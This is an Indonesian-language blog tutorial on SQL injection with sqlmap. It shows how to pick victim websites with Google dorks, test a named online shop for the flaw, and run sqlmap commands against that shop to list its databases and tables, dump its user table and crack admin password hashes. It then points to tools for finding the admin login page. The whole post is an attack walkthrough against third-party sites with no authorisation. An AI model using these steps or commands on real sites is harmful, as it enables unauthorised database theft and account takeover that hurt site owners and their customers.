Assalamu’alaikum Wr. Wb.
Beberapa hari yang lalu berjam – jam ngetes web vuln SQL injection pake Havij gak ada yang bisa di scan meskipun pake havij yang versi terbaru. Akhirnya ya udah saya buat aja tutorialnya pakai tool sqlmap. SQLmap merupakan tool scanning SQL Injection berbasis python yang ada pada Linux. Tool ini dapat dijalankan di linux, tapi kalo di windows juga bisa dengan bantuan Active Python. Pertama kamu download Active Python dulu, linknya ada di bawah ini.
Untuk 86 bit dan 32 bit = http://www.activestate.com/activepython/downloads/thank-you?dl=http://downloads.activestate.com/ActivePython/releases/2.7.5.6/ActivePython-2.7.5.6-win32-x86.msi
Untuk yang 64 bit = http://www.activestate.com/activepython/downloads/thank-you?dl=http://downloads.activestate.com/ActivePython/releases/2.7.5.6/ActivePython-2.7.5.6-win64-x64.msi
Kalo udah di download, langsung di install aja.
Setelah di install, sekarang kita download tool sqlmap. Linknya dibawah ini
Kalo udah di download, taruh file sqlmap di localdisk C:
Kalo udah di copy, extract filenya. Caranya klik kanan file sqlmap, kemudian klik extract here.
Tunggu prosesnya sampai selesai.
Nah udah selesai kan. Sekarang cari dork untuk SQL injection. Ada 6851 dork di perpustakaan ISC. Ini linknya: http://perpustakaan.indosecuritycyber.tk/hacking/6851dorkSQLi.txt
Contoh disini saya menggunakan dork inurl:product.php?c=
Cara pakainya buka www.google.co.id kemudian masukkan dorknya ke kotak pencarian.
Tuh keluar banyak banget webnya. Itu target semua. Sekarang kita cari target untuk di scan. Disini saya kasih contoh target http://www.vana-shop.com/product.php?c=1
Copy URL target ke address bar.
Setalah itu kasih tanda petik ‘ di belakang URL untuk memastikan vuln dan tidaknya. Kemudian tekan enter.
Setelah loading selesai kalau ada tulisan “You have an error in your SQL syntax” dan seterusnya, brarti webnya vuln.
Nah setelah tadi Active Python di install, sekarang PC kita bisa mengenali file .py. Sekarang kita buka Command Promt (CMD) kemudian jalankan sqlmap.
Caranya klik Start à All Programs atau Programs à Accessories à klik Command Promt.
Tampilannya seperti dibawah ini.
Ketik perintah “cd..” tanpa tanda petik kemudian tekan enter seperti dibawah ini
Ketik perintah “cd..” kemudian tekan enter lagi seperti dibawah ini
Ketik perintah “cd sqlmap” kemudian tekan enter seperti dibawah ini
Sekarang ketik perintah “sqlmap.py -u URL_TARGET --dbs”
Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 --dbs
Tunggu sampai proses selesai, kalo disuruh mengetik perintah, ketik “y” kemudian tekan enter (kadang).
Lihat gambar dibawah ini, databasenya udah ditemukan. Ada information_schema dan k4735093_vnsh099.
Masukkan perintah “sqlmap.py -u URL_TARGET -D NAMA_DATABASE --tables”
Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables
Nah lihat gambar dibawah ini, table (table) databasenya udah ditemukan. Kita cari yang berhubungan dengan user. Misal kita pakai yang user seperti dibawah ini.
Masukkan perintah “sqlmap.py -u URL_TARGET -D NAMA_DATABASE -T NAMA_TABLE --columns”
Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns
Tunggu sampai terlihat seperti di bawah ini.
Sekarang kita lihat isi datanya.
Masukkan perintah “sqlmap.py -u URL_TARGET -D NAMA_DATABASE -T NAMA_TABLE --dump”
Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump
Jika passwordnya ada yang diencrypt / berbentuk md5, nanti ada notifikasinya seperti dibawah ini. Ketik “Y” kalo ingin di crack sekalian. Atau ketik “n” kalau ingin melewati proses cracking md5. Kemudian tekan enter.
Nah sekarang udah keliatan kan yang dicari. Ada username dan kata sandi / password untuk login admin.
Untuk mencari halaman login bisa menggunakan adminfinder, havij, acunetix, dll. Sekian dulu tutorialnya, semoga bermanfaat :)
Wassalamu’alaikum Wr. Wb.
No comments:
Post a Comment